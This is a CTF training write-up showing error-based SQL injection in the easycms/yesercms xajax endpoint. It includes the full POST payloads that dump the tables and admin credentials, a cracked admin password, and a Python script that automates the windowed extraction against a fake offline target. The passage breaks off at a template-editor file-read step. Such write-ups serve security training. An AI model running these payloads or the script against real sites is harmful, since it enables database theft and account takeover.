This challenge is from the i春秋 (ichunqiu) CTF training camp.
The challenge description is not much help. Opening the link shows that the site is actually easycms, and a quick Baidu search turns up plenty of public vulnerabilities for it.
I went straight for error-based injection (UpdateXML).
The injection point is url/celive/live/header.php. POST the following xajax request and the current database name comes back inside the MySQL XPATH error message:
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
POST again to list the tables of the current database:
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
An annoying problem here: the error message only displays 32 characters, so the result has to be read in pieces by changing the offset (the 1 in mid(...,1,32)), and this database has a lot of tables (I don't know how the pros located the yesercms_user table so precisely). Next, dump its columns:
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(column_name) from information_schema.columns where table_name='yesercms_user'),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
Finally, dump the usernames and passwords. This request is shown double URL-encoded (%2527 for the quote, %2528 for the parenthesis, and so on), exactly as it was sent; decoded, the q element reads detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from yesercms_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520yesercms_user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>
The md5 hash is longer than the 32-character window, so once again move the offset in mid(...,1,32) to read the complete hash.
This gives admin|ff512d4240cbbdeafada404677ccbe61; cracking the md5 gives the plaintext Yeser231.
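Moving the mid() offset by hand for every 32-character window is tedious, so here is an added example (not code from the write-up) that automates it. It keeps only what the payloads above establish: the xajax/xjxquery wrapper, the UpdateXML/CONCAT/mid() form and the 0x5b/0x5d ("[" and "]") markers. Everything else is an assumption made for the example: the function names, the fact that MySQL truncates the XPATH error text to 32 characters (so 31 characters of data fit after the leading "["), and the fake_send stand-in that imitates the target with one constructed row so the script runs offline. A real send function would POST the body to url/celive/live/header.php and, like the last request above, URL-encode it for the transport.

```python
import re

# Added example, not the write-up's own code. It automates reading a scalar
# result through the UpdateXML() XPATH error one window at a time.
# Assumption: MySQL truncates the XPATH error text to 32 characters, and the
# leading "[" (0x5b) takes one of them, leaving 31 characters of data.
ERR_LIMIT = 32
WIDTH = ERR_LIMIT - 1

XPATH_ERR = re.compile(r"XPATH syntax error: '([^']*)'")


def build_payload(subquery: str, offset: int, width: int = WIDTH) -> str:
    """POST body for one window of the scalar result of `subquery`, in the
    same shape as the requests in the write-up (hypothetical helper)."""
    inner = (
        f"detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid(({subquery}),{offset},{width}),0x5d),1)),"
        "NULL,NULL,NULL,NULL,NULL,NULL)-- "
    )
    return f"xajax=Postdata&xajaxargs[0]=<xjxquery><q>{inner}</q></xjxquery>"


def extract_window(response: str):
    """Pull the text between "[" and "]" out of the error page.

    Returns (fragment, complete): `complete` is True when the closing "]"
    survived truncation, i.e. this was the last window of the result.
    Returns None when no XPATH error is present (wrong quoting, WAF, ...).
    """
    m = XPATH_ERR.search(response)
    if not m or not m.group(1).startswith("["):
        return None
    body = m.group(1)[1:]
    complete = body.endswith("]")
    if complete:
        body = body[:-1]
    return body, complete


def dump_scalar(send, subquery: str, width: int = WIDTH, max_windows: int = 64) -> str:
    """Read the full result of `subquery` through `send`, one window at a time.

    `send` is a callable taking the POST body and returning the response text.
    """
    pieces = []
    offset = 1
    for _ in range(max_windows):
        parsed = extract_window(send(build_payload(subquery, offset, width)))
        if parsed is None:
            raise RuntimeError("no XPATH error in response; check the injection point")
        piece, complete = parsed
        pieces.append(piece)
        # When the result length is an exact multiple of `width` the "]" is
        # cut off every time; the next window then comes back empty ("[]").
        if complete or not piece:
            break
        offset += len(piece)
    return "".join(pieces)


# --- constructed stand-in for the target so the script runs offline ----------

FAKE_ROWS = {
    # The row the write-up recovered; the only sample data in this example.
    "SELECT GROUP_CONCAT(concat(username,'|',password)) from yesercms_user":
        "admin|ff512d4240cbbdeafada404677ccbe61",
}


def fake_send(body: str) -> str:
    """Mimic MySQL: apply mid() to the stored string, wrap it in [ ] and
    truncate the error text to ERR_LIMIT characters."""
    m = re.search(r"mid\(\((.*)\),(\d+),(\d+)\),0x5d\)", body)
    subquery, offset, width = m.group(1), int(m.group(2)), int(m.group(3))
    data = FAKE_ROWS[subquery]
    value = "[" + data[offset - 1 : offset - 1 + width] + "]"
    return f"XPATH syntax error: '{value[:ERR_LIMIT]}'"


if __name__ == "__main__":
    q = "SELECT GROUP_CONCAT(concat(username,'|',password)) from yesercms_user"
    print(dump_scalar(fake_send, q))
```

Against the fake target the 38-character admin row needs two requests: the first window returns 31 characters with the "]" truncated away, the second returns the remaining 7 characters with the "]" intact, which is what ends the loop. The closing bracket is therefore not just decoration: it is the only reliable end-of-data signal you get from a truncated error message.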
Log in as admin to reach the admin panel and hunt for an upload point; none of them seem to be of any use, and trying to write a one-line webshell into a file doesn't seem to work either. After reading the write-up I learned that the template editor in the admin panel has a file read vulnerability. Exploit the vulnerability